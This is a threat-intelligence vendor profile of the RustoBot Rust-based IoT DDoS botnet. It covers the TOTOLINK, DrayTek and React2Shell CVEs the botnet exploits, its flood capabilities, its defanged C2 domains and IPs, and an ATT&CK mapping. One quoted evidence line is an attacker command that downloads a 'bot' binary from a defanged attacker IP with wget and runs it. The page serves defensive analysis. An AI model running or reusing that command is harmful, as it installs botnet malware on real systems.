Skip to main content
Live Webinar with SANS (June 25)— Agentic CTI Automation for Fun & ProfitRegister Free
Mallory
Back to malware
MalwareExploits 4 CVEs

Rustobot

RustoBot is a Rust-based Linux/IoT botnet used for DDoS activity. Reporting in the provided content identifies it as an ELF executable often named "bot" and describes it as primarily targeting vulnerable TOTOLINK devices, with additional exploitation of DrayTek routers also reported. Observed initial access vectors include exploitation of TOTOLINK command-injection flaws CVE-2022-26210 and CVE-2022-26187, and the DrayTek vulnerability CVE-2024-12987, which enable remote code execution on affected routers. Fortinet-listed affected devices include TOTOLINK N600R, A830R, A3100R, A950RG, A800R, A3000RU, and A810R, and DrayTek Vigor2960 and Vigor300B. RustoBot supports multiple architectures including arm5, arm6, arm7, mips, mpsl, and x86, with observed payloads often targeting TOTOLINK devices via the mpsl architecture.

Its core capability is launching DDoS attacks. The content states it can perform UDP flood, TCP flood, and Raw IP flood attacks, with tasking received from command-and-control infrastructure specifying method, target IP/port, duration, and packet length. Fortinet also reports that the malware uses XOR-based obfuscation and Global Offset Table manipulation to hinder reverse engineering, and that it uses DNS-over-HTTPS to determine the infected device's public IP.

The malware is associated with campaigns exploiting CVE-2025-55182 ("React2Shell") against organizations including Russian insurance, e-commerce, and IT companies, where attackers occasionally deployed RustoBot alongside XMRig, Kaiji, and Sliver. In one such case, attackers downloaded an ELF binary named "bot" from 176.117.107[.]154, which BI.ZONE identified as RustoBot. The content also states that RustoBot embeds XMRig as a secondary payload for monetization.

Reported command-and-control and related infrastructure includes domains ilefttotolinkalone.anondns[.]net, rustbot.anondns[.]net, bitcoinbandit.anondns[.]net, cryptoenjoyers.anondns[.]net, and dontblockme.anondns[.]net, which were reported resolving to 45.137.201[.]137 in one campaign, as well as dvrhelper[.]anondns[.]net and other C2 domains reported by Fortinet as pointing to 5.255.125[.]150. Victimology in Fortinet reporting was primarily in the technology sector across Japan, Taiwan, Vietnam, and Mexico.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
EXPLOITED CVES

Vulnerabilities exploited

4 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

4 CVES
CVE-2025-55182React2Shell

React2Shell in Russia: ... In some cases, the final payloads were the Kaiji and Rustobot botnets...

via risky biz rssnews.risky.biz
CVE-2022-26187Command Injection in TOTOLINK cstecgi.cgi pingCheckExploited in the wild

Among the key vulnerabilities used: CVE-2022-26187 (via pingCheck)

via security online infosecurityonline.info
CVE-2022-26210Command Injection in TOTOLINK setUpgradeFWExploited in the wild

FortiGuard analysts noticed a sharp uptick in attack attempts exploiting long-standing vulnerabilities in TOTOLINK’s cstecgi.cgi script... Among the key vulnerabilities used: CVE-2022-26210 (via setUpgradeFW)

via security online infosecurityonline.info
CVE-2024-12987OS Command Injection in DrayTek Vigor2960/Vigor300B Web Management InterfaceExploited in the wild

Among the key vulnerabilities used: CVE-2024-12987 (affecting DrayTek routers through /cgi-bin/mainfunction.cgi/apmcfgupload)

via security online infosecurityonline.info
MITRE ATT&CK

Techniques & procedures

4 distinct techniques documented for this family, organized by ATT&CK tactic.

Resource Development

1 technique
T1583.006Web ServicesEvidence1

"...final payloads were the Kaiji and Rustobot botnets and the Sliver implant."

Execution

2 techniques
T1059.004Unix ShellEvidence1

After compromising a host via the React2Shell vulnerability, threat actors executed the following commands inside a container: /bin/sh -c 'cd /tmp; wget hxxp://176.117.107[.]154/bot; chmod 777 bot; ./bot...'

T1203Exploitation for Client ExecutionEvidence1

The threat actors leveraged the CVE‑2025‑55182 (React2Shell) vulnerability... Under certain conditions, this can enable an attacker to execute arbitrary code on the server.

Command and Control

1 technique
T1105Ingress Tool TransferEvidence1

This script downloaded the XMRig cryptocurrency miner... The attackers also loaded the d5.sh Bash script onto the compromised host to download the Sliver implant... The attackers employed the check.sh Bash script to download ELF executables (a_x86 / a_x64) from a server.

INDICATORS OF COMPROMISE

IOCs tracked for this family

10 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
9 tracked

IPs, domains, and DNS infrastructure linked to this family.

Other
1 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting
ip.v4●●●●●●●●●●●●View more in app5 months ago
domain●●●●●●●●●●●●View more in app5 months ago
domain●●●●●●●●●●●●View more in app5 months ago
ip.v4●●●●●●●●●●●●View more in app5 months ago
uri●●●●●●●●●●●●View more in app5 months ago
domain●●●●●●●●●●●●View more in app5 months ago
ACTIVITY FEED

Recent activity

8 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

8 SOURCESView more in app
the hacker newsNews
Jan 29, 2026
ThreatsDay Bulletin: New RCEs, Darknet Busts, Kernel Bugs & 25+ More Stories

Botnet payload deployed alongside other malware following exploitation activity.

Read more
thecyberexpress com vulnerabilitiesNews
Jan 28, 2026
React2Shell Vulnerability CVE-2025-55182 Actively Exploited

Rust-based botnet capable of multiple DDoS flood modes; resolves C2-related domains and can deploy/contain XMRig as a secondary payload for monetization.

Read more
cyber security newsNews
Jan 27, 2026
Attackers Exploiting React2Shell Vulnerability to Attack IT Sectors

Botnet payload delivered post-exploitation in campaigns targeting Russian entities (specific capabilities not detailed in the provided content).

Read more
risky biz rssNews
Jan 25, 2026
EU readies new anti-spyware group, but with even less powers than PEGA

Botnet malware deployed as a post-exploitation payload in some React2Shell exploitation cases.

Read more
+4 more in the timeline
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching10

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities4

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping4

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.